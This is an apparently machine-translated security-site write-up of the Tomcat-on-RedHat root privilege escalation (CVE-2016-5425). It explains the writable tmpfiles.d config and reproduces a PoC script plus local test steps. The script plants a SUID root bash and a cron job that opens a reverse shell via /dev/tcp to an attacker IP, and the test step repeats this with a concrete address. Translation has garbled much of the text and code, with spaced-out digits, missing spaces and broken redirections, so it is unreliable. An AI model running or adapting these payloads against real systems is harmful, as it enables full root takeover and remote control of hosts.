I. vulnerability description
Apache Tomcat on RedHat distributions local to mention the right vulnerability
II. Background description
Tomcat is by Apache Software Foundation subordinate’s Jakarta a project development Servlet vessel, in accordance with Sun Microsystems to provide the technical specifications, the realization of the Servlet and JavaServer Page（JSP）support, and provides as aWeb serversome unique functions, like Tomcat managed and controls the platform, secure domain management and the Tomcat valve and so on.
Official website: http://tomcat.apache.org/
III. Description
Apache Tomcat on RedHat distributions the installation package, including CentOS, RedHat, OracleLinux, Fedora,etc. after installation due to file permissions configured properly, it will create a new one to allow the tomcat user permission to read and write to tmpfiles. d configuration files, for example, an attacker can use a WEB vulnerability to read and write to this file, allowing the attacker from the tomcat user permission to elevate to root privileges to achieve complete control of the system.
IV. Vulnerability description
Based on the RedHat release version of Tomcat after installing tomcat, set the user to tomcat. conf file has write permissions, as follows
[root@localhost ~]# ls-al /usr/lib/tmpfiles. d/tomcat. conf
-rw-rw-r–. 1 root tomcat 4 3 May 1 2 2 0 1 5 /usr/lib/tmpfiles. d/tomcat. conf
tmpfiles. d directory where the configuration file is systemd-tmpfiles used to manage the temporary file, an attacker could very easily inject the malicious payload into the tomcat. conf file, such as a new rally SHELL, the new one has the SUID permission of a file. When/usr/bin/systemd-tmpfiles when executed, the injected payload will get executed.
In REDHAT distributions, the default boot, systemd-tmpfiles will by systemd-tmpfiles-setup. Service service to be implemented, as follows:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup. service |grep ExecStart
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depends on the system used, systemd-tmpfiles may also be through other services, cronjobs,startup scripts, and other ways to trigger. Worthy of note in another place is that systemd-tmpfiles will not because the configuration file syntax errors cause an error stop. Therefore an attacker can easily inject malicious PAYLOAD to/usr/lib/tmpfiles. d/tomcat. conf
According to the following POC, we can see
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bash
z /usr/share/tomcat/rootsh 4 7 7 0 root root -
F /etc/cron. d/tomcatexploit 0 6 4 4 root root -"* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1
Is injected into tomcat. conf meaning is to bounce the SHELL, and the new one has the SUID permissions of the shell,in particular C, z,F meaning, The we can man 5 tmpfiles. d to view.
V. POC and the local test
-----------[ tomcat-RH-root.sh ]---------

#!/ bin/bash

Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit

CVE-2 0 1 6-5 4 2 5

Full advisory at:

http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html

Discovered and coded by:

Dawid Golunski

http://legalhackers.com

Tested on RedHat, CentOS, OracleLinux, Fedora systems.

For testing purposes only.

ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9 0 9 0

echo-e “\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2 0 1 6-5 4 2 5 *”
echo-e “Discovered by Dawid Golunski\n”
echo “[+] Checking vulnerability”
ls-l /usr/lib/tmpfiles. d/tomcat. conf | grep ‘tomcat’
if [ $? -ne 0 ]; then
echo “Not vulnerable or the tomcat installed under a different user than ‘tomcat’”
exit 1
fi
echo-e “\n[+] Your system is vulnerable!”

echo-e “\n[+] Appending data to the /usr/lib/tmpfiles. d/tomcat. conf…”
cat>/usr/lib/tmpfiles. d/tomcat. conf
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bash
z /usr/share/tomcat/rootsh 4 7 7 0 root root -
F /etc/cron. d/tomcatexploit 0 6 4 4 root root -“* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1 & \n\n”
eof

echo “[+] /usr/lib/tmpfiles. d/tomcat. conf contains:”
cat /usr/lib/tmpfiles. d/tomcat. conf
echo-e “\n[+] Payload injected! Wait for your root shell…\n”
echo-e “Once ‘/usr/bin/systemd-tmpfiles --create’ gets executed (on reboot by tmpfiles-setup. service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n”
--------------[ eof]--------------------
Local test:

1. First determine the next local LINUX distribution and version, and TOMCAT version
   ! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 1 1 1 3 3 6 3 5 4 9 7. png? www. myhack58. com)
2. Switch to the tomcat group permissions, additional malicious payload to/usr/lib/tmpfiles. d/tomcat. conf file
   ! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 1 1 1 3 3 6 3 5 3 1 0. png? www. myhack58. com)
   cat>/usr/lib/tmpfiles. d/tomcat. conf
   F /etc/cron. d/tomcatexploit 0 6 4 4 root root -“* * * * * root nohup bash-i >/dev/tcp/192.168.1.3/9 9 9 9 0&1 & \n\n”

[1] [2] next